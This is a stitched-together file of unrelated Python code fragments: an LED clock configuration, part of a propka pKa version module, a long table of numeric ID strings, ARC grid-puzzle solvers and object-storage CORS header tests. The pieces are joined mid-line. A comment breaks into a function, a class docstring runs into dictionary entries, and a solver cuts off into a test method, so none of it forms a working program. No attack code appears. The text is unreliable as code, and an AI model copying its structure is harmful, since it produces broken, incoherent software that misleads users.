ClockScrollOut = "V" # V = vertical H = horizontal default is "V"
# Push button setup
PushButtonGPIOPort = 21 # pin number (not GPIO number) on the GPIO header, switched against ground
LongPushTime = 1 # duration in seconds until the long-press event fires
PushButtonDePrell = 0.03 # debounce time for the push button (should normally stay unchanged) - default = 0.03
PushButtonStatus = "NotActive" # enable or disable the push button
# "NotActive" = disabled if no push button is present - "Active" = enabled if a push button is present
# Weather news and Telegram API keys
WeatherNewsAPIKey = "<KEY>" # enter your own OpenWeatherMap API key here
TelegramAPIKey = "<KEY>" # enter the bot token of the Telegram bot you created here
# City for the weather news
WheatherNewsCity = "Musterstadt" # enter the desired city here
# RSS feed URL for severe weather warnings --> Berlin is used as the example here
BadWeatherURL = "https://wettwarn.de/rss/bxx.rss" # find your region or city here: --> https://wettwarn.de/wettwarn_wetterwarnungen/warnregion_waehlen/
BadWeatherMode = "off" # on = show severe weather warnings off = do not show severe weather warnings
# Further settings
HideClockTimeHour = "23" # hide the clock from this hour on (hour of day --> no leading zero) --> -1 = never hide the clock
ShowClockTimeHour = "6" # show the clock again from this hour on (hour of day --> no leading zero)
AutoShowClock = "off" # on = show the clock at sunrise - off = only show the clock from the configured hour (ShowClockTimeHour)
# (If "WetterNews" is disabled, AutoShowClock is "off")
DisplayContrastHigh = 16 # full display contrast
DisplayContrastLow = 5 # low display contrast
FullDisplayContrastHour = 12 # full display contrast from this hour on --> weather-dependent if weather news is enabled
MinDisplayContrastHourWinter = 15 # low display contrast from this hour on (hour of day - in winter)
MinDisplayContrastHourSummer = 19 # low display contrast from this hour on (hour of day - in summer)
# Birthday greeting date
DateOfBirth = "07.03"
HDBL = "" # federal state for public holidays --> leaving this empty outputs only the nationwide holidays (see below for the states)
AlertMaxCPUTemp = 70 # show an alert when the CPU temperature reaches X degrees or more
NewsTrigger = 15 # check for new news after X seconds (of each minute)
TriggerWeatherData = 5 # only show the weather data every X minutes if nothing changed
CurrentDateTimeCounter = 3 # only show the current date every X minutes
WaitTimeforOnline = 8 # show "Internetstatus: Offline" every X seconds while there is no internet connection
GhostMode = "off" # on = show the ghost at midnight off = do not show the ghost at midnight
SoundMode = "off" # on = beim | |
def checkExceptions(self, residue1, residue2):
"""
checks for exceptions for this version - using defaults
"""
exception = False
value = None
resType1 = residue1.resType
resType2 = residue2.resType
if (resType1 == "COO" and resType2 == "ARG"):
exception, value = checkCooArgException_old(residue1, residue2, version=self)
value = self.valueCooArgException
elif (resType1 == "ARG" and resType2 == "COO"):
exception, value = checkCooArgException_old(residue2, residue1, version=self)
value = self.valueCooArgException
elif (resType1 == "COO" and resType2 == "COO"):
exception, value = checkCooCooException(residue1, residue2)
value = self.valueCooCooException
elif (resType1 == "CYS" and resType2 == "CYS"):
exception, value = checkCysCysException(residue1, residue2)
elif (resType1 == "COO" and resType2 == "HIS") or \
(resType1 == "HIS" and resType2 == "COO"):
exception, value = checkCooHisException(residue1, residue2)
elif (resType1 == "CYS" and resType2 == "HIS") or \
(resType1 == "HIS" and resType2 == "CYS"):
exception, value = checkCysHisException(residue1, residue2)
else:
""" do nothing, no exception for this pair """
return exception, value
def checkCoulombPair(self, residue1, residue2, distance):
"""
Checks if this Coulomb interaction should be done - a propka2.0 hack
"""
Npair = residue1.Nmass + residue2.Nmass
do_coulomb = True
if residue1.resType in self.coulomb_list and residue2.resType in self.coulomb_list:
# distance criteria
if distance > self.coulomb_cutoff[1]:
do_coulomb = False
# famous COO-TYR exception
if (residue1.resType == "COO" and residue2.resType == "TYR") or \
(residue2.resType == "COO" and residue1.resType == "TYR"):
""" do nothing """
elif Npair < self.Nmin:
do_coulomb = False
else:
do_coulomb = False
#print "%s - %s Npair=%4d %s" % (residue1.label, residue2.label, Npair, do_coulomb)
return do_coulomb
def setCoulombCutOff(self, cutoff):
"""
sets the cutoff for calculating Coulomb interactions
"""
self.coulomb_cutoff = cutoff
def calculateSideChainEnergy(self, distance, dpka_max, cutoff, weight, f_angle):
"""
redirects to get the correct side-chain interaction
"""
# the former if True/else toggle always took the first branch; the scaling is always applied
prefactor = (1.0 + weight*self.scaleUpBuriedSideChain)
return calculate.SideChainEnergy(distance, prefactor*dpka_max, cutoff, f_angle)
def calculateCoulombEnergy(self, distance, weight):
"""
redirects to get the correct Coulomb interaction - linear for default
"""
if self.CoulombModel == "Linear":
return calculate.linearCoulombEnergy(distance, weight, self, verbose=False)
elif self.CoulombModel == "Coulomb":
return calculate.CoulombEnergy(distance, weight, self, verbose=False)
else:
pka_print("Coulomb \"%s\" is not implemented" % (self.CoulombModel))
sys.exit(8)
def calculateCoulombWeight(self, Nmass1, Nmass2):
"""
calculates the weight for the Coulomb interaction - used for version "Dec18" & "Sep23"
"""
N_pair = Nmass1 + Nmass2
Nmin = 2*self.Nmin
Nmax = 2*self.Nmax
weight = float(N_pair - Nmin)/float(Nmax - Nmin)
weight = min(1.0, weight)
weight = max(0.0, weight)
return weight
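# Worked example: with Nmin = 300 and Nmax = 600 (the values used by the
# versions below), the pair range becomes [600, 1200], so Nmass1 = Nmass2 = 450
# gives weight = (900 - 600)/(1200 - 600) = 0.5; pairs below 600 clamp to 0.0
# and pairs above 1200 clamp to 1.0.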
# --- specific versions with different behaviour or initialization ---
class Jan01(Version):
"""
This is a test to set up rules for the propka Jan01 version
"""
def __init__(self, verbose=True):
"""
Rules of action for version Jan01
"""
Version.__init__(self, verbose=False)
self.name = "Jan01"
if verbose == True:
pka_print("creating propka version \"%s\"" % (self.name))
self.Nmin = 300
self.Nmax = 600
self.buried_cutoff = 15.50
self.desolv_cutoff = 15.50
self.setDesolvation("propka2")
self.setCoulomb("Linear", cutoff=[4.0, 7.0], diel=None, scaled_diel=None, scaled=False)
self.doingBackBoneReorganization = False
def checkCoulombPair(self, residue1, residue2, distance):
"""
Checks if this Coulomb interaction should be done - a propka2.0 hack
"""
do_coulomb = True
# check all Coulomb criteria!
if residue1.resType in self.coulomb_list and residue2.resType in self.coulomb_list:
# distance criteria
if distance > self.coulomb_cutoff[1]:
do_coulomb = False
# famous COO-TYR exception
if (residue1.resType == "COO" and residue2.resType == "TYR") or \
(residue2.resType == "COO" and residue1.resType == "TYR"):
""" do nothing """
elif lib.checkBuried(residue1.Nmass, residue2.Nmass) == False:
do_coulomb = False
else:
do_coulomb = False
return do_coulomb
def calculateCoulombWeight(self, Nmass1, Nmass2):
"""
calculates the weight for the Coulomb interaction - used for version "Dec18" & "Sep23"
"""
if lib.checkBuried(Nmass1, Nmass2) == False:
return 0.0
else:
return 1.0
class Oct13(Version):
"""
To test ligand integration
"""
def __init__(self, verbose=True):
"""
Rules of action for version Oct13, based on Sep07
"""
Version.__init__(self, verbose=False)
self.name = "Oct13"
if verbose == True:
pka_print("creating propka version \"%s\"" % (self.name))
self.Nmin = 280
self.Nmax = 560
self.buried_cutoff = 15.00
self.desolv_cutoff = 20.00
self.setDesolvation("VolumeModel", prefactor=-13.12, fudge=0.40, allowance=0.0, scaled=True)
self.setCoulomb("Coulomb", cutoff=[4.0, 10.0], diel=80.0, scaled_diel=True, scaled=False)
self.doingBackBoneReorganization = True
coulomb_list = ["COO", "CYS", "TYR", "HIS", "LYS", "ARG", "N+ "]
# ligand parameters
self.read_ion_parameters()
mono_atomic_ions = ['LIG']
self.pl_coulomb_list = coulomb_list+mono_atomic_ions
def read_ion_parameters(self):
""" Reads in ions.list """
self.ions = {}
self.ions_long_names = {}
file = os.path.join(os.path.dirname(__file__), 'ions.list')
if not os.path.isfile(file):
pka_print('Error: Could not find ion parameter file:', file)
sys.exit(9)
lines = open(file,'r').readlines()
for line in lines:
words = line[:line.find('#')].split()
if len(words) == 2:
self.ions[words[0]] = int(words[1])
self.ions_long_names[words[0]] = line[line.find('#')+1:-1]
return
def getQ(self, resName):
"""
Returns a residue charge
"""
Q = {'C- ':-1.0,
'ASP':-1.0,
'GLU':-1.0,
'CYS':-1.0,
'TYR':-1.0,
'HIS': 1.0,
'LYS': 1.0,
'ARG': 1.0,
'N+ ': 1.0}
if resName in Q:
return Q[resName]
elif resName in self.ions.keys():
return self.ions[resName]
else:
return 0.00
def resName2Type(self, resName):
"""
Expands the standard resName2Type to make sure that ion names are included
"""
resType = {'C- ': "COO",
'ASP': "COO",
'GLU': "COO",
'HIS': "HIS",
'CYS': "CYS",
'TYR': "TYR",
'LYS': "LYS",
'ARG': "ARG",
'N+ ': "N+ ",
'SER': "ROH",
'THR': "ROH",
'ASN': "AMD",
'GLN': "AMD",
'TRP': "TRP"}
if resName in resType.keys():
return resType[resName]
elif resName in self.ions.keys():
return 'LIG'
else:
return None
def checkCoulombPair(self, residue1, residue2, distance):
"""
Checks if this Coulomb interaction should be done - a propka2.0 hack
"""
do_coulomb = True
# check all Coulomb criteria!
if residue1.resType in self.pl_coulomb_list and residue2.resType in self.pl_coulomb_list:
# distance criteria
if distance > self.coulomb_cutoff[1]:
do_coulomb = False
# famous COO-TYR exception
if (residue1.resType == "COO" and residue2.resType == "TYR") or \
(residue2.resType == "COO" and residue1.resType == "TYR"):
""" do nothing """
elif lib.checkBuried(residue1.Nmass, residue2.Nmass) == False:
do_coulomb = False
else:
do_coulomb = False
return do_coulomb
class Jan15(Version):
"""
This is a test to set up rules for different propka Jan15 version
"""
def __init__(self, verbose=True):
"""
Rules of action for version Jan15
"""
Version.__init__(self, verbose=False)
self.name = "Jan15"
if verbose == True:
pka_print("creating propka version \"%s\"" % (self.name))
self.Nmin = 300
self.Nmax = 600
self.buried_cutoff = 15.50
self.desolv_cutoff = 15.50
self.setDesolvation("ContactModel", prefactor=-0.01, allowance=400.0, scaled=False)
self.setCoulomb("Linear", cutoff=[4.0, 7.0], diel=None, scaled_diel=None, scaled=False)
self.doingBackBoneReorganization = False
def checkCoulombPair(self, residue1, residue2, distance):
"""
Checks if this Coulomb interaction should be done - a propka2.0 hack
"""
do_coulomb = True
# check all Coulomb criteria!
if residue1.resType in self.coulomb_list and residue2.resType in self.coulomb_list:
# distance criteria
if distance > self.coulomb_cutoff[1]:
do_coulomb = False
# famous COO-TYR exception
if (residue1.resType == "COO" and residue2.resType == "TYR") or \
(residue2.resType == "COO" and residue1.resType == "TYR"):
""" do nothing """
elif lib.checkBuried(residue1.Nmass, residue2.Nmass) == False:
do_coulomb = False
else:
do_coulomb = False
return do_coulomb
def calculateCoulombWeight(self, Nmass1, Nmass2):
"""
calculates the weight for the Coulomb interaction - used for version "Dec18" & "Sep23"
"""
if lib.checkBuried(Nmass1, Nmass2) == False:
return 0.0
else:
return 1.0
class May13(Version):
"""
This is a test to set up rules for different propka May13 version
"""
def __init__(self):
"""
Rules of action for version May13
"""
Version.__init__(self, verbose=False)
self.name = "May13"
self.coulomb_cutoff = 7.00
pka_print("creating propka version \"%s\"" % (self.name))
def checkExceptions(self, residue1, residue2):
"""
overwrites 'exceptions' from the default
"""
exception = False
value = 0.00
return exception, value
class Dec18(Version):
"""
This is a test to set up rules for different propka versions
"""
def __init__(self, verbose=True):
"""
Rules of action for version Dec18
"""
Version.__init__(self, verbose=False)
self.name = "Dec18"
if verbose == True:
pka_print("creating propka version \"%s\"" % (self.name))
self.Nmin = 300
self.Nmax = 600
self.buried_cutoff = 15.50
self.desolv_cutoff = 15.50
self.setDesolvation("propka2", prefactor=-0.01, allowance=400.0, scaled=False)
self.setCoulomb("Linear", cutoff=[4.0, 7.0], diel=None, scaled_diel=None, scaled=True)
self.doingBackBoneReorganization = False
class Dec19(Version):
"""
This is a test to set up rules for different propka versions
"""
def __init__(self, verbose=True):
"""
Rules of action for version Dec19
"""
Version.__init__(self, verbose=False)
self.name = "Dec19"
if verbose == True:
pka_print("creating propka version \"%s\"" % (self.name))
self.Nmin = 300
self.Nmax = 600
self.buried_cutoff = 15.50
self.desolv_cutoff = 15.50
self.setDesolvation("ContactModel", prefactor=-0.01, allowance=400.0, scaled=False)
self.setCoulomb("Linear", cutoff=[4.0, 7.0], diel=None, scaled_diel=None, scaled=True)
self.doingBackBoneReorganization = False
class Aug24(Version):
"""
4466 4535",
50405: "4362 4466 4536",
50406: "4362 4466 4537",
50407: "4362 4466 4538",
50408: "4362 4466 4539",
50409: "4362 4466 4540",
50410: "4362 4466 4541",
50411: "4362 4466 4542",
50412: "4362 4466 4543",
50413: "4362 4466 4544",
50414: "4362 4466 4545",
50415: "4362 4466 4546",
50416: "4362 4467",
50417: "4362 4467 4520",
50418: "4362 4467 4521",
50419: "4362 4467 4522",
50420: "4362 4467 4523",
50421: "4362 4467 4524",
50422: "4362 4467 4525",
50423: "4362 4467 4526",
50424: "4362 4467 4527",
50425: "4362 4467 4528",
50426: "4362 4467 4529",
50427: "4362 4467 4530",
50428: "4362 4467 4531",
50429: "4362 4467 4532",
50430: "4362 4467 4533",
50431: "4362 4467 4534",
50432: "4362 4467 4535",
50433: "4362 4467 4536",
50434: "4362 4467 4537",
50435: "4362 4467 4538",
50436: "4362 4467 4539",
50437: "4362 4467 4540",
50438: "4362 4467 4541",
50439: "4362 4467 4542",
50440: "4362 4467 4543",
50441: "4362 4467 4544",
50442: "4362 4467 4545",
50443: "4362 4467 4546",
50444: "4362 4468",
50445: "4362 4468 4520",
50446: "4362 4468 4521",
50447: "4362 4468 4522",
50448: "4362 4468 4523",
50449: "4362 4468 4524",
50450: "4362 4468 4525",
50451: "4362 4468 4526",
50452: "4362 4468 4527",
50453: "4362 4468 4528",
50454: "4362 4468 4529",
50455: "4362 4468 4530",
50456: "4362 4468 4531",
50457: "4362 4468 4532",
50458: "4362 4468 4533",
50459: "4362 4468 4534",
50460: "4362 4468 4535",
50461: "4362 4468 4536",
50462: "4362 4468 4537",
50463: "4362 4468 4538",
50464: "4362 4468 4539",
50465: "4362 4468 4540",
50466: "4362 4468 4541",
50467: "4362 4468 4542",
50468: "4362 4468 4543",
50469: "4362 4468 4544",
50470: "4362 4468 4545",
50471: "4362 4468 4546",
50472: "4362 4469",
50473: "4362 4469 4520",
50474: "4362 4469 4521",
50475: "4362 4469 4522",
50476: "4362 4469 4523",
50477: "4362 4469 4524",
50478: "4362 4469 4525",
50479: "4362 4469 4526",
50480: "4362 4469 4527",
50481: "4362 4469 4528",
50482: "4362 4469 4529",
50483: "4362 4469 4530",
50484: "4362 4469 4531",
50485: "4362 4469 4532",
50486: "4362 4469 4533",
50487: "4362 4469 4534",
50488: "4362 4469 4535",
50489: "4362 4469 4536",
50490: "4362 4469 4537",
50491: "4362 4469 4538",
50492: "4362 4469 4539",
50493: "4362 4469 4540",
50494: "4362 4469 4541",
50495: "4362 4469 4542",
50496: "4362 4469 4543",
50497: "4362 4469 4544",
50498: "4362 4469 4545",
50499: "4362 4469 4546",
50500: "4363 4449",
50501: "4363 4449 4520",
50502: "4363 4449 4521",
50503: "4363 4449 4522",
50504: "4363 4449 4523",
50505: "4363 4449 4524",
50506: "4363 4449 4525",
50507: "4363 4449 4526",
50508: "4363 4449 4527",
50509: "4363 4449 4528",
50510: "4363 4449 4529",
50511: "4363 4449 4530",
50512: "4363 4449 4531",
50513: "4363 4449 4532",
50514: "4363 4449 4533",
50515: "4363 4449 4534",
50516: "4363 4449 4535",
50517: "4363 4449 4536",
50518: "4363 4449 4537",
50519: "4363 4449 4538",
50520: "4363 4449 4539",
50521: "4363 4449 4540",
50522: "4363 4449 4541",
50523: "4363 4449 4542",
50524: "4363 4449 4543",
50525: "4363 4449 4544",
50526: "4363 4449 4545",
50527: "4363 4449 4546",
50528: "4363 4450",
50529: "4363 4450 4520",
50530: "4363 4450 4521",
50531: "4363 4450 4522",
50532: "4363 4450 4523",
50533: "4363 4450 4524",
50534: "4363 4450 4525",
50535: "4363 4450 4526",
50536: "4363 4450 4527",
50537: "4363 4450 4528",
50538: "4363 4450 4529",
50539: "4363 4450 4530",
50540: "4363 4450 4531",
50541: "4363 4450 4532",
50542: "4363 4450 4533",
50543: "4363 4450 4534",
50544: "4363 4450 4535",
50545: "4363 4450 4536",
50546: "4363 4450 4537",
50547: "4363 4450 4538",
50548: "4363 4450 4539",
50549: "4363 4450 4540",
50550: "4363 4450 4541",
50551: "4363 4450 4542",
50552: "4363 4450 4543",
50553: "4363 4450 4544",
50554: "4363 4450 4545",
50555: "4363 4450 4546",
50556: "4363 4451",
50557: "4363 4451 4520",
50558: "4363 4451 4521",
50559: "4363 4451 4522",
50560: "4363 4451 4523",
50561: "4363 4451 4524",
50562: "4363 4451 4525",
50563: "4363 4451 4526",
50564: "4363 4451 4527",
50565: "4363 4451 4528",
50566: "4363 4451 4529",
50567: "4363 4451 4530",
50568: "4363 4451 4531",
50569: "4363 4451 4532",
50570: "4363 4451 4533",
50571: "4363 4451 4534",
50572: "4363 4451 4535",
50573: "4363 4451 4536",
50574: "4363 4451 4537",
50575: "4363 4451 4538",
50576: "4363 4451 4539",
50577: "4363 4451 4540",
50578: "4363 4451 4541",
50579: "4363 4451 4542",
50580: "4363 4451 4543",
50581: "4363 4451 4544",
50582: "4363 4451 4545",
50583: "4363 4451 4546",
50584: "4363 4452",
50585: "4363 4452 4520",
50586: "4363 4452 4521",
50587: "4363 4452 4522",
50588: "4363 4452 4523",
50589: "4363 4452 4524",
50590: "4363 4452 4525",
50591: "4363 4452 4526",
50592: "4363 4452 4527",
50593: "4363 4452 4528",
50594: "4363 4452 4529",
50595: "4363 4452 4530",
50596: "4363 4452 4531",
50597: "4363 4452 4532",
50598: "4363 4452 4533",
50599: "4363 4452 4534",
50600: "4363 4452 4535",
50601: "4363 4452 4536",
50602: "4363 4452 4537",
50603: "4363 4452 4538",
50604: "4363 4452 4539",
50605: "4363 4452 4540",
50606: "4363 4452 4541",
50607: "4363 4452 4542",
50608: "4363 4452 4543",
50609: "4363 4452 4544",
50610: "4363 4452 4545",
50611: "4363 4452 4546",
50612: "4363 4453",
50613: "4363 4453 4520",
50614: "4363 4453 4521",
50615: "4363 4453 4522",
50616: "4363 4453 4523",
50617: "4363 4453 4524",
50618: "4363 4453 4525",
50619: "4363 4453 4526",
50620: "4363 4453 4527",
50621: "4363 4453 4528",
50622: "4363 4453 4529",
50623: "4363 4453 4530",
50624: "4363 4453 4531",
50625: "4363 4453 4532",
50626: "4363 4453 4533",
50627: "4363 4453 4534",
50628: "4363 4453 4535",
50629: "4363 4453 4536",
50630: "4363 4453 4537",
50631: "4363 4453 4538",
50632: "4363 4453 4539",
50633: "4363 4453 4540",
50634: "4363 4453 4541",
50635: "4363 4453 4542",
50636: "4363 4453 4543",
50637: "4363 4453 4544",
50638: "4363 4453 4545",
50639: "4363 4453 4546",
50640: "4363 4454",
50641: "4363 4454 4520",
50642: "4363 4454 4521",
50643: "4363 4454 4522",
50644: "4363 4454 4523",
50645: "4363 4454 4524",
50646: "4363 4454 4525",
50647: "4363 4454 4526",
50648: "4363 4454 4527",
50649: "4363 4454 4528",
50650: "4363 4454 4529",
50651: "4363 4454 4530",
50652: "4363 4454 4531",
50653: "4363 4454 4532",
50654: "4363 4454 4533",
50655: "4363 4454 4534",
50656: "4363 4454 4535",
50657: "4363 4454 4536",
50658: "4363 4454 4537",
50659: "4363 4454 4538",
50660: "4363 4454 4539",
50661: "4363 4454 4540",
50662: "4363 4454 4541",
50663: "4363 4454 4542",
50664: "4363 4454 4543",
50665: "4363 4454 4544",
50666: "4363 4454 4545",
50667: "4363 4454 4546",
50668: "4363 4455",
50669: "4363 4455 4520",
50670: "4363 4455 4521",
50671: "4363 4455 4522",
50672: "4363 4455 4523",
50673: "4363 4455 4524",
50674: "4363 4455 4525",
50675: "4363 4455 4526",
50676: "4363 4455 4527",
50677: "4363 4455 4528",
50678: "4363 4455 4529",
50679: "4363 4455 4530",
50680: "4363 4455 4531",
50681: "4363 4455 4532",
50682: "4363 4455 4533",
50683: "4363 4455 4534",
50684: "4363 4455 4535",
50685: "4363 4455 4536",
50686: "4363 4455 4537",
50687: "4363 4455 4538",
50688: "4363 4455 4539",
50689: "4363 4455 4540",
50690: "4363 4455 4541",
50691: "4363 4455 4542",
50692: "4363 4455 4543",
50693: "4363 4455 4544",
50694: "4363 4455 4545",
50695: "4363 4455 4546",
50696: "4363 4456",
50697: "4363 4456 4520",
50698: "4363 4456 4521",
50699: "4363 4456 4522",
50700: "4363 4456 4523",
50701: "4363 4456 4524",
50702: "4363 4456 4525",
50703: "4363 4456 4526",
50704: "4363 4456 4527",
50705: "4363 4456 4528",
50706: "4363 4456 4529",
50707: "4363 4456 4530",
50708: "4363 4456 4531",
50709: "4363 4456 4532",
50710: "4363 4456 4533",
50711: "4363 4456 4534",
50712: "4363 4456 4535",
50713: "4363 4456 4536",
50714: "4363 4456 4537",
50715: "4363 4456 4538",
50716: "4363 4456 4539",
50717: "4363 4456 4540",
50718: "4363 4456 4541",
50719: "4363 4456 4542",
50720: "4363 4456 4543",
50721: "4363 4456 4544",
50722: "4363 4456 4545",
50723: "4363 4456 4546",
50724: "4363 4457",
50725: "4363 4457 4520",
50726: "4363 4457 4521",
50727: "4363 | |
diagonals of the matrices. There can be multiple
such patterns in the grid. For each pattern identified,
we have to add two blue squares of the same size to its neighbourhood.
The positions of these blue squares depend on the following:
1. The positions of the green squares
2. Whether the green squares are connected via the principal or the
secondary diagonal
The positions for the blue squares can be determined once we identify
the above two. Finally, these two squares are marked as blue.
How this function works:
We start by going through each element in the array, row-wise.
Once a green element is found, we check whether the larger
square containing the pattern has already been visited.
If not, the size of the smaller squares in the figure/pattern is found
by starting from the current element and moving right until a
non-green element is found. The number of moves taken is then
used to calculate the following:
- Size and position of the two small squares in the pattern
- Size and position of the large square containing the pattern
- Size and position of the blocks to be changed to blue
These also depend on whether the green diagonal of the large
square is the principal or the secondary one. Finally, we modify the
required blocks to blue.
Correctness:
All the given cases are solved.
Arguments:
x : Input Numpy array of dimension 2 and equal shape
values for both axes
Returns:
A copy of x with required transformations applied
"""
x = x.copy() # Create copy of input array
rows, cols = x.shape # Get row and column count
green = 3 # Value for green
blue = 8 # Value for blue
found = [] # For figures already visited
# Loop through each block on the grid
# We will always find the first block of top
# part for the figure first. The algorithm makes
# use of this to find the pattern and solve the task.
for i in range(rows):
for j in range(cols):
if x[i][j] == green:
# Check if this figure/square was already visited
done = any([all([i >= f[0], i <= f[1], j >= f[2], j <= f[3]]) for f in found])
if done:
continue # Go to next block as this square was already visited
# Get size of smaller squares in the figure
# For this we start from current cell and we move right till
# we find a cell that's not green
# This will give count as n-1 for smaller square of size n
# So if size of smaller square is 2, we get 1 as c
c = 0 # Initialise count as 0
while (j + c + 1) < cols and x[i][j + c + 1] == green:
c += 1
# Set starting column and ending column values for smaller square
start_pos = j
end_pos = j + c
# Now there are two ways the pattern can come
# Either the squares are connected via principal diagonal or
# secondary diagonal
# Check if its connected via secondary diagonal
# For this, lets set the positions of larger
# square (parent matrix) which contains the two small squares
s_i = i # Starting row for the square
e_i = i + 2 * (c + 1) # Ending row for the square
s_j = j - c - 1 # Starting column + 1 for the square
e_j = end_pos + 1 # Ending column + 1 for the square
parent_matrix = x[s_i:e_i, s_j:e_j] # Get parent matrix
parent_matrix_diag = np.fliplr(parent_matrix).diagonal() # Get secondary diagonal
if np.all(parent_matrix_diag == green): # Check if all blocks in diagonal are green
found.append([s_i, e_i - 1, s_j, e_j - 1]) # Mark the visit to this parent square
# Lets set the square on top left first to blue
# Get index positions for the square
top_left_s_i = s_i - (1 + c)
top_left_e_i = s_i - 1
top_left_s_j = s_j - (c + 1)
top_left_e_j = s_j - 1
# Modify the index values so that they are within bounds
top_left_s_i, top_left_e_i, top_left_s_j, top_left_e_j = set_to_bounds(
top_left_s_i, top_left_e_i, top_left_s_j, top_left_e_j, low=0, high=rows-1)
# Mark the required blocks as blue
x[top_left_s_i:top_left_e_i + 1, top_left_s_j:top_left_e_j + 1] = blue
# Now, set the square on bottom right to blue
# Get index positions for the square
bottom_right_s_i = e_i
bottom_right_e_i = e_i + c
bottom_right_s_j = e_j
bottom_right_e_j = e_j + c
# Modify the index values so that they are within bounds
bottom_right_s_i, bottom_right_e_i, bottom_right_s_j, bottom_right_e_j = set_to_bounds(
bottom_right_s_i, bottom_right_e_i, bottom_right_s_j, bottom_right_e_j, low=0, high=rows-1)
# Mark the required blocks as blue
x[bottom_right_s_i:bottom_right_e_i + 1, bottom_right_s_j:bottom_right_e_j + 1] = blue
continue # Go to next block
# Check if they are connected via principal diagonal
# Get index positions for parent matrix
# s_i and e_i remains the same as before
s_j = start_pos # Starting column + 1 for the square
e_j = j + 2 * (c + 1) # Ending column + 1 for the square
parent_matrix = x[s_i:e_i, s_j:e_j] # Get parent matrix
parent_matrix_diag = parent_matrix.diagonal() # Get principal diagonal
if np.all(parent_matrix_diag == green): # Check if all blocks in diagonal are green
found.append([s_i, e_i - 1, s_j, e_j - 1]) # Mark the visit to this parent square
# Lets set the square on top right first to blue
# Get index positions for the square
top_right_s_i = s_i - (c + 1)
top_right_e_i = s_i - 1
top_right_s_j = e_j
top_right_e_j = e_j + c
# Modify the index values so that they are within bounds
top_right_s_i, top_right_e_i, top_right_s_j, top_right_e_j = set_to_bounds(
top_right_s_i, top_right_e_i, top_right_s_j, top_right_e_j, low=0, high=rows-1)
# Mark the required blocks as blue
x[top_right_s_i:top_right_e_i + 1, top_right_s_j:top_right_e_j + 1] = blue
# Now, set the square on bottom left to blue
# Get index positions for the square
bottom_left_s_i = e_i
bottom_left_e_i = e_i + c
bottom_left_s_j = s_j - (c + 1)
bottom_left_e_j = s_j - 1
# Modify the index values so that they are within bounds
bottom_left_s_i, bottom_left_e_i, bottom_left_s_j, bottom_left_e_j = set_to_bounds(
bottom_left_s_i, bottom_left_e_i, bottom_left_s_j, bottom_left_e_j, low=0, high=rows-1)
# Mark the required blocks as blue
x[bottom_left_s_i:bottom_left_e_i + 1, bottom_left_s_j:bottom_left_e_j + 1] = blue
return x
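# Note: the solver above calls a set_to_bounds helper that is not shown in this
# excerpt. A minimal sketch consistent with its call sites (clamping four
# indices into the inclusive range [low, high]), given as an assumption rather
# than the original implementation:
#
#     def set_to_bounds(s_i, e_i, s_j, e_j, low, high):
#         clamp = lambda v: max(low, min(high, v))
#         return clamp(s_i), clamp(e_i), clamp(s_j), clamp(e_j)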
def solve_dc0a314f(x):
"""
Solves task dc0a314f
Description:
Given an array, we must find the values that should fill the square marked with green colours (3). The whole
array appears to be symmetric, and the cells occupied by the green points should be replaced by the
corresponding elements elsewhere in the array.
How this function works:
This task entails filling in the values for the missing pieces (green colours). We found that, to obtain the
solution, the array should be reconstructed as a symmetric one and the missing pieces then read off from it.
To create such a symmetric array, we divide the array into four quadrants and choose the lower-left part
of the array. We then flip this part vertically to obtain the lower-right half and join the two halves
together (left and right). Flipping this horizontally gives the upper part of the array, from which
we can create the symmetric array. Comparing this constructed array with the original array, we can easily
read off the solution.
Correctness:
All the given cases are solved.
Arguments:
x : Input Numpy array of dimension 2 and equal shape
values for both axes
Returns:
A copy of x with required transformations applied
"""
dim1, dim2 = x.shape # get the dimensions(rows,columns respectively) from the array
half = int(dim1 / 2) # calculate the middle for the rows
x_ = x.copy() # make a copy of x
result = np.argwhere(x_ == 3)
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {'Access-Control-Expose-Headers': 'X-Foo-Header'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with Access-Control-Expose-Headers header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Access-Control-Expose-Headers',
response.headers,
msg="Access-Control-Expose-Headers header was set")
expected = 'X-Foo-Header'
received = response.headers.get('Access-Control-Expose-Headers')
self.assertEqual(
expected,
received,
msg='object created with Access-Control-Expose-Headers header'
' value expected: {0} received: {1}'.format(
expected,
received))
@data_driven_test(ObjectDatasetList())
@ObjectStorageFixture.required_features('object-cors')
def ddtest_object_creation_with_access_control_max_age(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {'Access-Control-Max-Age': '5'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with Access-Control-Max-Age header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Access-Control-Max-Age',
response.headers,
msg="Access-Control-Max-Age header was set")
expected = '5'
received = response.headers.get('Access-Control-Max-Age')
self.assertEqual(
expected,
received,
msg='object created with Access-Control-Max-Age header'
' value expected: {0} received: {1}'.format(
expected,
received))
@data_driven_test(ObjectDatasetList())
@ObjectStorageFixture.required_features('object-cors')
def ddtest_object_creation_with_access_control_request_headers(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {'Access-Control-Request-Headers': 'x-requested-with'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with Access-Control-Request-Headers header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Access-Control-Request-Headers',
response.headers,
msg="Access-Control-Request-Headers header was set")
expected = 'x-requested-with'
received = response.headers.get('Access-Control-Request-Headers')
self.assertEqual(
expected,
received,
msg='object created with Access-Control-Request-Headers header'
' value expected: {0} received: {1}'.format(
expected,
received))
@data_driven_test(ObjectDatasetList())
@ObjectStorageFixture.required_features('object-cors')
def ddtest_object_creation_with_access_control_request_method(
